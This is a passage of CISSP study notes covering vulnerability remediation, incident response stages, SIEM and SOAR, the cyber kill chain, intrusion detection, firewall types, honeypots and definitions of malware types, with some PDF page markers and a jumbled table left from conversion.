Step 3: determine what is actionable
The analysis process leads to valuable results only if they are actionable
6.4.1 Remediation
Rather than software defects, most vulnerabilities in average orgs come from misconfigured systems,
inadequate policies, unsound business processes, or unaware staff
Vuln remediation should include all stakeholders, not just IT
6.4.2 Exception handling
Exception handling: the process of handling unexpected activity, since software should never depend on
users behaving properly
"expect the unexpected", gracefully handle invalid input and improperly sequenced activity etc
Sometimes vulns can't be patched in a timely manner (e.g. medical devices needing re-accreditation) and
the solution is to implement compensatory controls, document the exception and decision, and revisit
compensatory controls: measures taken to address any weaknesses of existing controls or to
compensate for the inability to meet specific security requirements due to various different
constraints
e.g. micro-segmentation of device, access restrictions, monitoring etc
Exception handling may be required due to system crash as the result of patching (requiring roll-back)
6.4.3 Ethical disclosure
While conducting security testing, cybersecurity pros may discover previously undiscovered vulns
(perhaps implementing compensating controls to correct) that they may be unable to correct
Ethical disclosure: the idea that security pros who detect a vuln have a responsibility to report it to the
vendor, providing them with enough time to patch or remediate
the disclosure should be made privately to the vendor providing reasonable amount of time to
correct
if the vuln is not corrected, then public disclosure of the vuln is warranted, such that other
professionals can make informed decisions about future use of the product(s)
123 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Heuristics: method of machine learning which identifies patterns of acceptable activity, so that deviations from
the patterns will be identified
Incident: an event which potentially or actually jeopardizes the CIA of an information system or the info the
system processes, stores, transmits
Indicator: technical artifact or observable occurrence suggesting that an attack is imminent, currently
underway, or already occurred
Indicators of Compromise (IoC): a signal that an intrusion, malware, or other predefined hostile or hazardous
set of events has or is occurring
Information Security Continuous Monitoring (ICSM): maintaining ongoing awareness of information security,
vulnerabilities and threats to support organizational risk management decisions; ongoing monitoring sufficient
to ensure and assure effectiveness of security controls
Information Sharing and Analysis Center (ISAC): entity or collab created for the purposes of analyzing critical
cyber and related info to better understand security problems and interdependencies to ensure CIA
Log: record of actions/events that have taken place on a system
Motion detector types: wave pattern motion detectors transmit ultrasonic or microwave signals into the
monitored area watching for changes in the returned signals bouncing off objects; infrared heat-based
detectors watch for unusual heat patters; capacitance detectors work based on electromagnetic fields
MTBF: mean time between failure is an estimation of time between the first and any subsequent failures
MTTF: mean time to failure is the expected typical functional lifetime of the device given a specific operating
environment
MTTR: mean time to repair is the average length of time required to perform a repair on the device
Netflow: data that contains info on the source, destination, and size of all network communications and is
routinely saved as a matter of normal activity; captures info about the parties involved in a communication and
the amount of data exchanged
Precursor: signal from events suggesting a possible change of conditions, that may alter the current threat
landscape
Regression testing: testing of a system to ascertain whether recently approved modifications have changed its
performance, or if other approved functions have introduced unauthorized behaviors
Request For Change (RFC): documentation of a proposed change in support of change management activities
Resource capacity agreement: used to make sure the appropriate resources will be available in a recovery
scenario
Root Cause Analysis: principle-based systems approach for the identification of underlying causes associated
with a particular risk set or incidents
RTBH (Remote Triggered Black Hole): a network security technique used in conjunction with firewalls and
routers to mitigate Distributed Denial of Service (DDoS) attacks or unwanted traffic by dropping malicious or
unwanted traffic before it reaches the target network; RTBH works by creating a "black hole route", where
packets destined for a specific IP address are discarded or "dropped" by the network equipment, effectively
isolating malicious traffic
Sampling: one of two main methods of choosing records from a large pool for further analysis, sampling uses
statistical techniques to choose a sample that is representative of the entire pool; sampling is a data extraction
process, where elements are selected from a large body of data to construct a meaningful representation or
summary of the whole; statistical sampling uses precise math functions to extract meaningful info from a large
volume of data (also see clipping)
SCCM: System Center Configuration Manager is a Microsoft systems management software product that
provides the capability to manage large groups of computers providing remote control, patch management,
software distribution, operating system deployment, and hardware and software inventory
Security Incident: Any attempt to undermine the security of an org or violation of a security policy is a security
incident
SWG (Secure Web Gateway): a security solution that filters and monitors internet traffic for orgs, ensuring that
users can securely access the web while blocking malicious sites, preventing data leaks, and enforcing web
126 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
browsing policies; while it is not a traditional firewall, it complements firewall functionality by focusing
specifically on web traffic security
TCP Wrappers: a host-based network access control system used in Unix-like operating systems to filter
incoming connections to network services; allows administrators to define which IP addresses or hostnames are
allowed or denied access to certain network services, such as SSH, FTP, or SMTP, by controlling access based
on incoming TCP connections; TCP Wrappers relies on two config files: /etc/hosts.allow, and /etc/hosts.deny
Trusted Computing Base (TCB): the collection of all hardware, software, and firmware components within an
architecture that is specifically responsible for security and the isolation of objects that forms a trusted base
TCB is a term that is usually associated with security kernels and the reference monitor
a trusted base enforces the security policy
a security perimeter is the imaginary boundary that separates the TCB from the rest of the system; TCB
components communicate with non-TCB components using trusted paths
Reference Monitor Concept (RMC): the logical part of the TCB that confirms whether a subject has the
right to use a resource prior to granting access; based on three principles: Complete Mediation (all
access must be validated by the Reference Monitor), Verifiability (the correct operation of the Reference
monitor can be analyzed and verified), and Isolation (the Reference Monitor must be protected from
unauthorized modification or tampering)
the security kernel is the collection of the TCB components that implement the functionality of the
reference monitor
Tuple: tuple usually refers to a collection of values that represent specific attributes of a network connection or
packet; these values are used to uniquely identify and manage network flows, as part of a state table or rule set
in a firewall; as an example, a 5-tuple is as a bundle of five values that identify a specific connection or network
session, which might include the sourced IP address, source port numbers, destination IP address, destination
port number, and the specific protocol in use (e.g. TCP UDP)
Vendor Management System (VMS): software that assists with the management and procurement of staffing
services, hardware, software, and other products and services
View-Based access controls: access control that allows the database to be logically divided into components
like records, fields, or groups allowing sensitive data to be hidden from non-authorized users; admins can set up
views by user type, allowing only access to assigned views
7.1 Understand and comply with investigations (OSG-10 Chpt 19)
Investigation: a formal inquiry and systematic process that involves gathering information to determine the
cause of a security incident or violation
Investigators must be able to conduct reliable investigations that will hold up in court; securing the scene is an
essential and critical part of every investigation
securing the scene might include any/all of the following:
sealing off access to the area or crime scene
taking images of the scene
documenting evidence
ensuring evidence (e.g. computers, mobile devices, portable drives etc) is not contacted, tampered
with, or destroyed
general principles:
identify and secure the scene
protect evidence -- proper collection of evidence preserves its integrity and the chain of custody
identification and examination of the evidence
further analysis of the most compelling evidence
final reporting of findings
Locard exchange principle: whenever a crime is committed something is taken, and something is left behind
127 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
small changes like interacting with the keyboard, mouse, loading/unloading programs, or of course
powering off the system, can change or eliminate live evidence
Whenever a forensic investigation of a storage drive is conducted, two identical bit-for-bit copies of the
original drive should be created first
eDiscovery(E-Discovery): the process of identifying, collecting, and producing electronically stored
information for legal proceedings; the E-Discovery reference model (EDRM) has 9 steps:
. Information Governance - ensuring information is well-organized, and balancing value, risk and cost
. Identification - locating potential sources of electronically stored information covered by a
discovery request, and determining its scope, breadth, and depth
. Preservation - ensuring data is protected and alteration or destruction
. Collection - gathering data for further use in the process
. Processing - screening and reducing the volume of data, and converting as appropriate to forms
suitable for review and analysis
. Review - evaluating data for relevance; what information needs to be provided, and what may need
to be protected
. Analysis - evaluating data for content and context
. Production - delivering electronically stored information in a sharable form
. Presentation - displaying before appropriate audiences (e.g. depositions, hearings, trials etc)
orgs that believe they will be the target of a lawsuit have a duty to preserve digital evidence
7.1.5 Artifacts (e.g., data, computer, network, mobile device)
Forensic artifacts: remnants of a system or network breach/attempted breach, which and may or may not
be relevant to an investigation or response
Artifacts can be found in numerous places, including:
computer systems
web browsers
mobile devices
hard drives, flash drives
7.2 Conduct logging and monitoring activities (OSG-10 Chpts 17,21)
7.2.1 Intrusion detection and prevention system (IDPS)
Intrusion: a security event, or a combination of multiple security events that constitutes an incident;
occurs when an attacker attempts to bypass or can bypass/thwart security mechanisms and access an
organizationʼs resources without the authority to do so
Intrusion detection: a specific form of monitoring events, usually in real time, to detect abnormal activity
indicating a potential incident or intrusion
Intrusion Detection System (IDS): (AKA burglar alarms) is a security service that monitors and analyzes
network or system events for the purpose of finding/providing realtime/neartime warnings of unauthorized
attempts to access system resources; automates the inspection of logs and real-time system events to
detect intrusion attempts and system failures
an IDS is intended as part of a defense-in-depth security plan
Intrusion Prevention Systems (IPS): an IPS is a security service that uses available info to determine if
an attack is underway, alerting and also blocking attacks from reaching intended target; includes
detection capabilities, youʼll also see them referred to as intrusion detection and prevention systems
(IDPSs);
an IPS can be a signature-based detection system which matches traffic patterns against a
database of known attack signatures; it can be anomaly or behavior-based detection, that starts
with a baseline, comparing activity to the baseline to detect abnormal activity; IPS can also be
policy-based, comparing activity to predefined security policies, or hybrid of these
131 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
NIST SP 800-94 Guide to Intrusion Detection and Prevention Systems provides comprehensive (albeit
outdated) coverage of both IDS and IPS
7.2.2 Security Information and Event Management (SIEM)
Security Information and Event Management (SIEM): systems that ingest logs from multiple sources,
compile and analyze log entries, and report relevant information
SIEM systems are complex and require expertise to install and tune
require a properly trained team that understands how to read and interpret info, and escalation
procedures to follow when a legitimate alert is raised
SIEM systems represent technology, process, and people, and each is important to overall
effectiveness
a SIEM includes significant intelligence functionality, allowing large amounts of logged events and
analysis and correlation of the same to occur very quickly
SIEM capabilities include:
Aggregation
Normalization
Correlation
Secure storage
Analysis
Reporting
7.2.3 Security orchestration, automation and response (SOAR)
Security Orchestration, Automation, and Response (SOAR): refers to a group of technologies that
allow orgs to respond to some incidents automatically; SOAR tech automates responses to incidents; a
primary benefit is that this reduces the workload of admins, and it removes/reduces the possibility of
human error by having a computer/system respond
Playbook: a document or checklist that defines how to verify an incident
Runbook: implements the playbook data into an automated tool
SOAR allows security admins to define these incidents and the response, typically using playbooks and
runbooks
Both SOAR and SIEM platforms can help detect and, in the case of SOAR, respond to threats against your
software development efforts
devs can be resistant to anything that slows down the development process, and this is where
DevSecOps can help build the right culture, and balance the needs of developers and security
7.2.4 Continuous monitoring and tuning
Effective continuous monitoring encompasses technology, processes, and people
Continuous monitoring steps are:
Define
Establish
Implement
Analyze/report
Respond
Review/update
Monitoring: the process of reviewing information logs, looking for something specific
necessary to detect malicious actions by subjects as well as attempted intrusions and system
failures
can help reconstruct events, provide evidence for prosecution, and create reports for analysis
continuous monitoring ensures that all events are recorded and can be investigated later if
necessary
132 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
monitoring is a form of auditing that focuses on active review of log file data; it's used to hold
subjects accountable for their actions and to detect abnormal or malicious activities
it is also used to gauge system performance
tools like IDSs and SIEMs automate continuous monitoring and provide real-time analysis of events,
including monitoring both ingress and egress network traffic
Log analysis: a detailed and systematic form of monitoring where logged info is analyzed for trends and
patterns as well as abnormal, unauthorized, illegal, and policy-violating activities
log analysis isnʼt necessarily in response to an incident, itʼs a periodic task
After a SIEM is set up, configured, tuned, and running, it must be routinely updated and continuously
monitored to function effectively
Tuning: tuning a SIEM is inherently the process of reducing false positives (incorrectly classifying a
benign activity, system state, or configuration as malicious or vulnerable), while not incurring false
negatives (NOT alerting on a true malicious activity or vulnerability); false positives can result in analyst
fatigue and reduced efficiency
7.2.5 Egress monitoring
Itʼs important to monitor traffic exiting as well as entering a network, and Egress monitoring refers to
monitoring outgoing traffic to detect unauthorized data transfer outside the org (AKA data exfiltration)
Common methods used to detect or prevent data exfiltration are data loss prevention (DLP)
techniques and monitoring for steganography
7.2.6 Log management
Log management: refers to all the methods used to collect, process, analyze, and protect log entries
(see SIEM definition above)
rollover logging: allows admins to set a maximum log size, when the log reaches that max, the system
begins overwriting the oldest events in the log
7.2.7 Threat intelligence (e.g. threat feeds, threat hunting)
Threat intelligence: an umbrella term encompassing threat research and analysis and emerging threat
trends; gathering data on potential threats, including various sources to get timely info on current threats;
information that is aggregated, transformed, analyzed, interpreted, or enriched to provide the necessary
context for the decision-making process
Threat feed: provide orgs with a steady stream of raw data providing security admins with threat feeds to
understand current threats; by using this knowledge to search through the network they can engage in
threat hunting looking for signs of these threats
Structured Threat Information eXpression (STIX): a standardized language that uses a JSON-based
lexicon to express and share threat intelligence information in a readable and consistent format
Trusted Automated eXchange of Intelligence Information (TAXII): the format through which threat
intelligence data is transmitted; TAXII is a transport protocol that supports transferring STIX insights over
Hyper Text Transfer Protocol Secure (HTTPS)
Kill chain: military model (used for both offense and defense):
find/identify a target through reconnaissance
get the targetʼs location
track the targetʼs movement
select a weapon to use on the target
engage the target with the selected weapon
evaluate the effectiveness of the attack
Orgs have adapted this model for cybersecurity: Lockheed Martin created the Cyber Kill Chain
framework including seven ordered stages of an attack:
reconnaissance: attackers gather info on the target
133 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
weaponization: attackers identify an exploit that the target is vulnerable to, along with methods to
send the exploit
delivery: attackers send the weapon to the target via phishing attacks, malicious email
attachments, compromised websites, or other common social engineering methods
exploitation: the weapon exploits a vulnerability on the target system
installation: code that exploits the vulnerability then installs malware with a backdoor allowing
attacker remote access
command and control: attackers maintain a command and control system, which controls the
target and other compromised systems
actions on objectives: attackers execute their original goals such as theft of money, or data,
destruction of assets, or installing additional malicious code (eg. ransomware)
7.2.8 User and Entity Behavior Analytics (UEBA)
UEBA (aka UBA): focuses on the analysis of user and entity behavior as a way of detecting inappropriate
or unauthorized activity (e.g. fraud, malware, insider attacks etc); analysis engines are typically included
with SIEM solutions or may be added via subscription; UEBA tools develop profiles of individual behavior
and monitor users for deviations from those profiles that may indicate malicious activity and/or
compromised accounts
Behavior-based detection: AKA statistical intrusion, anomaly, and heuristics-based detection, starts by
creating a baseline of normal activities and events; once enough baseline data has been accumulated to
determine normal activity, it can detect abnormal activity (that may indicate a malicious intrusion or
event)
Behavior-based IDSs use the baseline, activity statistics, and heuristic evaluation techniques to compare
current activity against previous activity to detect potentially malicious events
Static code scanning techniques: the scanner scans code in files, similar to white box testing
Dynamic techniques: the scanner runs executable files in a sandbox to observe their behavior
7.3 Perform Configuration Management (CM) (e.g. provisioning, baselining,
automation) (OSG-10 Chpt 16)
Configuration Management (CM): collection of activities focused on establishing and maintaining the integrity
of IT products and info systems, via the control of processes for initializing, changing, and monitoring the
configurations of those products/systems through their lifecycle; CM is the process of identifying, controlling,
and verifying the configuration of systems and components throughout their lifecycle
the three basic components of change control: request control, change control, and release control
CM is an integral part of secure provisioning and relates to the proper configuration of a device at the
time of deployment
CM helps ensure that systems are deployed in a secure, consistent state and that they stay in a secure,
consistent state throughout their lifecycle
Provisioning: taking a particular config baseline, making additional or modified copies, and placing those
copies into the environment in which they belong; refers to installing and configuring the operating system and
needed apps on new systems
new systems should be configured to reduce vulnerabilities introduced via default configurations; the key
is to harden a system based on intended usage
Hardening a system: process of applying security configurations, and locking down various hardware,
communications systems, software (e.g. OS, web/app server, apps etc); normally performed based on industry
guidelines and benchmarks like the Center for Internet Security (CIS);
makes it more secure than the default configuration and includes the following:
disable all unused services
close all unused logical ports
remove all unused apps
134 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
example of how SoD can be enforced, is by dividing the security or admin capabilities and functions
among multiple trusted individuals
Two-person control: (AKA two-man rule) requires the approval of two individuals for critical tasks
using two-person controls within an org ensures peer review and reduces the likelihood of collusion
and fraud
ex: privilege access management (PAM) solutions that create special admin accounts for
emergency use only; perhaps a password is split in half so that two people need to enter the
password to log on
Split knowledge: combines the concepts of separation of duties and two-person control into a single
solution; the info or privilege required to perform an operation is divided among two or more users,
ensuring that no single person has sufficient privileges to compromise the security of the environment; M
of N control is an example of split knowledge
Principles such as least privilege and separation of duties help prevent security policy violations,
and monitoring helps to deter and detect any violations that occur despite the use of preventive
controls
Collusion: an agreement among multiple people to perform some unauthorized or illegal actions;
implementing SoD, two-person control, or split knowledge policies help prevent fraud by limiting
actions individuals can do without colluding with others
7.4.3 Privileged account management
Privileged entities are trusted, but they can abuse privileges, and it's therefore essential to monitor all
assignments of privileged operations
The goal is to ensure that trusted employees do not abuse the special privileges that are granted;
monitoring these operations can also detect many attacks, because attackers commonly use special
privileges during an attack
Advanced privileged account management practices can limit the time users have advanced privileges
Privileged Account Management (PAM): solutions that restrict access to privileged accounts or detect
when accounts use any elevated privileges (e.g. admin accounts)
Microsoft domains, this includes local admin accounts, Domain and Enterprise Admins groups
Linux includes root or sudo accounts
PAM solutions should monitor actions taken by privileged accounts, new user accounts, new routes to a
router table, altering config of a firewall, accessing system log and audit files
7.4.4 Job rotation
Job rotation: (AKA rotation of duties) means that employees rotate through jobs or rotate job
responsibilities with other employees
using job rotation as a security control provides peer review, reduces fraud, and enables cross-
training
job rotation policy can act as both a deterrent and a detection mechanism
7.4.5 Service Level Agreements (SLA)
Service Level Agreement (SLA): an agreement between an organization and an outside entity, such as a
vendor, where the SLA stipulates performance expectations and often includes penalties if the vendor
doesnʼt meet these expectations
Memorandum of Understanding (MOU): documents the intention of two entities to work together
toward a common goal
7.5 Apply resource protection (OSG-10 Chpt 16)
Media management should consider all types of media as well as short- and long-term needs and evaluate:
136 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Confidentiality
Access speeds
Portability
Durability
Media format
Data format
For the test, data storage media should include any of the following:
Paper
Microforms (microfilm and microfiche)
Magnetic (HD, disks, and tapes)
Flash memory (SSD and memory cards)
Optical (CD and DVD)
Mean Time Between Failure (MTBF) is an important criterion when evaluating storage media, especially where
valuable or sensitive information is concerned
Media management includes the protection of the media itself, which typically involves policies and procedures,
access control mechanisms, labeling and marking, storage, transport, sanitization, use, and end-of-life
7.5.1 Media management
Media management: refers to the steps taken to protect media (i.e. anything that can hold data) and the
data stored on that media; includes most portable devices (e.g. smart phones, memory/flash cards etc)
media is protected throughout its lifetime and destroyed when no longer needed
As above, OSG-9 also refers to tape media, as well as “hard-copy data”
7.5.2 Media protection techniques
If media includes sensitive info, it should be stored in a secure location with strict access controls to
prevent loss due to unauthorized access
any location used to store media should have temperature and humidity controls to prevent losses
due to corruption
Media management can also include technical controls to restrict device access from computer systems
When media is marked, handled, and stored properly, it helps prevent unauthorized disclosure (loss of
confidentiality), unauthorized modification (loss of integrity), and unauthorized destruction (loss of
availability)
7.5.3 Data at rest/data in transit
This was previously covered in Domain 2 (see 2.6.4) - Data at rest and data in transit can be protected via
encryption
7.6 Conduct incident management (OSG-10 Chpt 17)
Analysis: Gathering and analyzing information about the incident to determine its scope, impact, and root
cause (e.g., by interviewing witnesses, collecting and analyzing evidence, and reviewing system logs)
Containment: Limiting the impact of the incident and preventing further damage (e.g., by isolating affected
systems, changing passwords, and implementing security controls)
Eradication: Removing the cause of the incident from the environment (e.g., by removing malware, patching
vulnerabilities, and disabling compromised accounts)
137 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Incident response (IR): the mitigation of violations of security policies and recommended practices; the
process to detect and respond to incidents and to reduce the impact when incidents occur; IR attempts to keep
a business operating or restore operations as quickly as possible in the wake of an incident
Incident management is usually conducted by an Incident Response Team (IRT), which comprises individuals
with the required expertise and experience to manage security incidents; the IRT is accountable for
implementing the incident response plan, which is a written record that defines the processes to be followed
during each stage of the incident response cycle
The main goals of incident response:
Provide an effective and efficient response to reduce impact to the organization
Maintain or restore business continuity
Defend against future attacks
An important distinction needs to be made to know when an incident response process should be initiated:
events take place continually, and the vast majority are insignificant; however, events that lead to some type of
adversity can be deemed incidents, and those incidents should trigger an org's incident response process steps
Incident Response Summary:
Step Stage Action/Goal
Preparation
(D)etection Triage identification
(R)esponse Triage activate IR team
(M)itigation Investigate containment
(R)eporting Investigate
(R)ecovery Recovery return to normal
(R)emediation Recovery prevention
(L)essons Learned Recovery improve process
The following steps (Detection, Response, Mitigation, Reporting, Recovery, Remediation, and Lessons Learned)
are on the exam; you can use the mnemonic DRMRRRL (drumroll)
In summary: after detecting and verifying an incident, the first response is to limit or contain the scope of
the incident while protecting evidence; based on governing laws, an org may need to report an incident to
official authorities, and if PII is affected, individuals need to be informed; the remediation and lessons
learned stages include root cause analysis to determine the cause and recommend solutions to prevent
reoccurrence
Preparation: includes developing the IR process, assigning IR team members, and everything related to what
happens when an incident is identified; preparation is critical, and will anticipate the steps to follow
7.6.1 Detection
Detection: the identification of potential security incidents via monitoring and analyzing security logs,
threat intelligence, or incident reports; as above, understanding the distinction between an event and an
incident, the goal of detection is to identify an adverse event (an incident) and begin dealing with it
Common methods to detect incidents:
intrusion detection and prevention systems
138 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
antimalware
automated tools that scan audit logs looking for predefined events
end users sometimes detect irregular activity and contact support
Note: receiving an alert or complaint doesnʼt always mean an incident has occurred
7.6.2 Response
After detecting and verifying an incident, the next step is activate an Incident Response (IR) or CSIRT
team
An IR team is AKA computer incident response team (CIRT) or computer security incident response team
(CSIRT)
Among the first steps taken by the IR Team will be an impact assessment to determine the scale of the
incident, how long the impact might be experienced, who else might need to be involved etc.
The IR team typical investigate the incident, assess the damage, collect evidence, report the incident,
perform recovery procedures, and participate in the remediation and lessons learned stages, helping with
root cause analysis
its important to protect all data as evidence during an investigation, and computers should not be
turned off
7.6.3 Mitigation
Mitigation: attempt to contain an incident; in addition to conducting an impact assessment, the IR Team
will attempt to minimize or contain the damage or impact from the incident
The IR Team's job at this point is not to fix the problem; it's simply to try and prevent further damage
Note this may involve disconnecting a computer from the network; sometimes responders take steps to
mitigate the incident, but without letting the attacker know that the attack has been detected
7.6.4 Reporting
Reporting occurs throughout the incident response process
Once an incident is mitigated, formal reporting occurs because numerous stakeholders often need to
understand what has happened
Jurisdictions may have specific laws governing the protection of personally identifiable information (PII),
and must report if it's been exposed
Additionally, some third-party standards, such as the Payment Card Industry Data Security Standard (PCI
DSS), require orgs to report certain security incidents to law enforcement
7.6.5 Recovery
Recovery is the next step, returning a system to a fully functioning state
Recovery: Restoring systems and data to their normal state (e.g., by restoring from backups, rebuilding
systems, and re-enabling compromised accounts); at this point, the goal is to start returning to normal
The most secure method of restoring a system after an incident is completely rebuilding the system from
scratch, including restoring all data from the most recent backup
effective configuration and change management will provide the necessary documentation to
ensure the rebuilt systems are configured properly
According to the OGS, you should check these areas as part of recovery:
access control lists (ACLs), including firewall or router rules
services and protocols, ensuring the unneeded services and protocols are disabled or removed
patches
user accounts, ensuring they have changed from default configs
known compromises have been reversed
7.6.6 Remediation
139 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Remediation: changes to a system's config to immediately limit or reduce the chance of reoccurrence of
an incident
Remediation stage: personnel look at the incident, identify what allowed it to occur, and then implement
methods to prevent it from happening again
Remediation includes performing a root cause analysis (which examines the incident to determine what
allowed it to happen), and if the root cause analysis identifies a vulnerability that can be mitigated, this
stage will recommend a change
7.6.7 Lessons Learned
Lessons Learned: documenting the incident and learning from it to improve future responses (e.g., by
identifying areas where the incident response process can be improved and by sharing lessons learned
with other organizations); lessons learned stage is an all-encompassing view of the situation related to an
incident, where personnel, including the IR team and other key stakeholders, examine the incident and the
response to see if there are any lessons to be learned
the output of this stage can be fed back to the detection stage of incident management
It's common for the IR team to create a report when they complete a lessons learned review
based on the findings, the team may recommend changes to procedures, the addition of security
controls, or even changes to policies
management will decide what recommendations to implement and is responsible for the remaining
risk for any recommendations they reject
NOTE: Incident management DOES NOT include a counterattack against the attacker
7.7 Operate and maintain detection and preventative measures (OSG-10 Chpts
11,17,21)
As noted in Domain 1, a preventive or preventative control is deployed to thwart or stop unwanted or
unauthorized activity from occurring
Examples:
fences
locks
biometrics
separation of duties policies
job rotation policies
data classification
access control methods
encryption
smart cards
callback procedures
security policies
security awareness training
antivirus software
firewalls
intrusion prevention systems
A detective control is deployed to discover or detect unwanted or unauthorized activity; detective controls
operate after the fact
Examples:
140 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Internal Segmentation Firewall (ISFW): used within a network to segment internal traffic and
control access between different parts of an org; an ISFW monitors and filters traffic between
network segments (such as between the finance department and HR), preventing lateral movement
of threats within the network; provides internal protection by monitoring east-west traffic, reduces
the risk of an insider threat or lateral movement, can enforce micro-segmentation, but can be
complex to configure and management
Firewall OSI Layers Key Features Strengths Weaknesses
Type
Static Basic filtering on No context
Packet Layer 3 source/destination IPs and Fast, low overhead awareness,
Filtering (Network) ports can't inspect
data payload
Application- Layer 7 Inspects application-level Deep inspection, High processing
overhead,
Level (Application) data blocks specific slower
applications performance
Low overhead, No payload
Circuit- Layer 5 Validates session monitors session inspection, can't
Level (Session) establishment validity detect deeper
threats
Stateful Layers 3-4 Tracks connection states Better security Doesn't inspect
Inspection (Network, across sessions than static filtering data at the
Transport) application layer
Combines stateful Comprehensive Expensive, high
NGFW Layers 3-7 inspection with deep threat detection, resource usage
packet inspection, IPS, application-aware
and app control
Prevents lateral Complex
ISFW Internal Filters traffic between movement, configuration,
Segmentation internal network segments enforces micro- typically for
segmentation internal use
7.7.2 Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS)
Intrusion Detection Systems (IDSs) and Intrusion Prevention Systems (IPSs) are two methods
organizations typically implement to detect and prevent attacks
Intrusion detection: a specific form of monitoring events, usually in real time, to detect abnormal activity
indicating a potential incident or intrusion
Intrusion Detection System (IDS) automates the inspection of logs and real-time system events to
detect intrusion attempts and system failures
IDSs are an effective method of detecting many DoS and DDoS attacks
an IDS actively watches for suspicious activity by monitoring network traffic and inspecting logs
an IDS is intended as part of a defense-in-depth security plan
knowledge-based detection: AKA signature-based or pattern-matching detection, the most
common method used by an IDS
behavior-based detection: AKA statistical intrusion, anomaly, and heuristics-based detection;
behavior-based IDSs use baseline, activity stats, and heuristic eval techniques to compare current
activity against previous activity to detect potentially malicious events
142 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
An IPS includes detection capabilities, youʼll see them referred to as intrusion detection and prevention
systems (IDPSs)
an IPS includes all the capabilities of an IDS but can also take additional steps to stop or prevent
intrusions
IDS/IPS should be deployed at strategic network locations to monitor traffic, such as at the perimeters, or
between network segments, and should be configured to alert for specific types of scans and traffic
patterns
See NIST SP 800-94
7.7.3 Whitelisting/blacklisting
Method used to control which applications run and which apps canʼt is via allow list, and deny list (AKA
whitelists and blacklists)
Application whitelisting or allow listing is a security option prohibiting unauthorized software from
executing; AKA deny by default or implicit deny
Allow list: identifies a list of apps authorized to run on a system and blocks all other apps
Deny list: identifies a list of apps that are not authorized to run on a system
Allow and deny lists are used for applications to help prevent malware infections
Important to note: a system would only use one list, either allow or deny
Apple iOS running on iPhones/iPads is an example of an extreme version of an allow list; users are only
able to install apps from the App Store
7.7.4 Third-party provided security services
Some orgs outsource security services such as auditing and penetration testing to third party security
services
Some outside compliance entities (e.g. PCI DSS) require orgs to ensure that service providers comply
OSG also mentions that some SaaS vendors provide security services via the cloud (e.g. next-gen
firewalls, UTM devices, and email gateways for spam and malware filtering)
7.7.5 Sandboxing
Sandboxing: refers to a security technique where a separate, secure environment is created to run and
analyze untested or untrusted programs or code without risking harm to the host device or network; this
isolated environment, known as a sandbox, effectively contains the execution of the code, allowing it to
run and behave as if it were in a normal computing environment, but without the ability to affect the host
system or access critical resources and data
Confinement: restriction of a process to certain resources, or reading from and writing to certain
memory locations; bounds are the limits of memory a process cannot exceed when reading or
writing;isolation is using bounds to create/enforce confinement
Sandboxing provides a security boundary for applications and prevents the app from interacting with
other apps; can be used as part of development, integration, or acceptance testing, as part of malware
screening, or as part of a honeynet
7.7.6 Honeypots/honeynets
Honeypots: individual computers created as a trap or a decoy for intruders or insider threats; a honeypot
typically has pseudo flaws and fake data to lure attackers
Honeynet: two or more networked honeypots used together to simulate a network; admins can observe
attacker's activity while they are in a honeypot, keeping them occupied, instead of attacking the
production network
They look and act like legit systems, but they do not host data of any real value for an attacker; admins
often configure honeypots with vulnerabilities to tempt intruders into attacking them
143 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
In addition to keeping the attacker away from a production environment, the honeypot allows
administrators to observe an attackerʼs activity without compromising the live environment
7.7.7 Anti-malware
Malware: program inserted into a system with the intent of compromising the CIA of the victim's data,
applications, or OS; malicious software that negatively impacts a system
The most important protection against malicious code is the use of antimalware software with up-to-date
signature files and heuristic capabilities
multi-pronged approach with antimalware software on each system in addition to filtering internet
content helps protect systems from infections
following the principle of least privilege, ensuring users do not have admin permissions on systems
wonʼt be able to install apps that may be malicious
These are the characteristics of each malware type:
virus: software written with the intent/capability to copy and disperse itself without direct owner
knowledge/cooperation; the defining characteristic is that it's a piece of malware that has to be
triggered in some way by the user; program that modifies other programs to contain a possibly
altered version of itself
viruses use four main propagation techniques:
file infection
service injection
boot sector infection
macro infection
worm: software written with the intent/capability to copy and disperse without owner
knowledge/cooperation, but without needing to modify other programs to contain copies of itself;
malware that can self-propagate and spread through a network or a series of systems on its own by
exploiting a vulnerability in those systems
companion: helper software that is not malicious on its own; it could be something like a wrapper
that accompanies the actual malware
macro: associated with Microsoft Office products, and is created using a straightforward
programming language to automate tasks; macros can be programmed to be malicious and harmful
multipartite: means the malware spreads in different ways (e.g. Stuxnet)
polymorphic: malware that can change aspects of itself as it replicates to evade detection (e.g. file
name, file size, code structure etc)
trojan: a Trojan horse is malware that looks harmless or desirable but contains malicious code;
trojans are often found in easily downloadable software; a trojan inserts backdoors or trapdoors
into other programs or systems
bot: an emerging class of mobile code; employing limited machine learning capabilities to assist
with user requests for help or assistance, automation of or assistance with workflows, data input
quality validation etc
bot herder: someone who controls a botnet, using a command-and-control server to remotely
control the zombies to launch attacks on other systems or send spam/phishing emails; bot herders
can also rent botnet access out to other criminals
botnet: a collection of compromised computing devices (called bots or zombies), organized in a
network controlled by a criminal known as a bot herder; these many infected systems that have
been harnessed together and act in unison;
boot sector infectors: pieces of malware that can install themselves in the boot sector of a drive
fileless malware: leaves no trace of its presence nor saves itself to a storage device, but is still
able to stay resident and active on a computer
hoaxes/pranks: not actually software, they're usually part of social engineering—via email or other
means—that intends harm (hoaxes) or a joke (pranks)
144 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
logic bomb: malware inserted into a program which will activate and perform functions suiting the
attacker when some later date/conditions are met; code that will execute based on some triggering
event
stealth: malware that uses various active techniques to avoid detection
ransome attack: any form of attack which threatens the destruction, denial or unauthorized public
release/remarketing of private information assets; usually involves encrypting assets and
withholding the decryption key until a ransom is paid
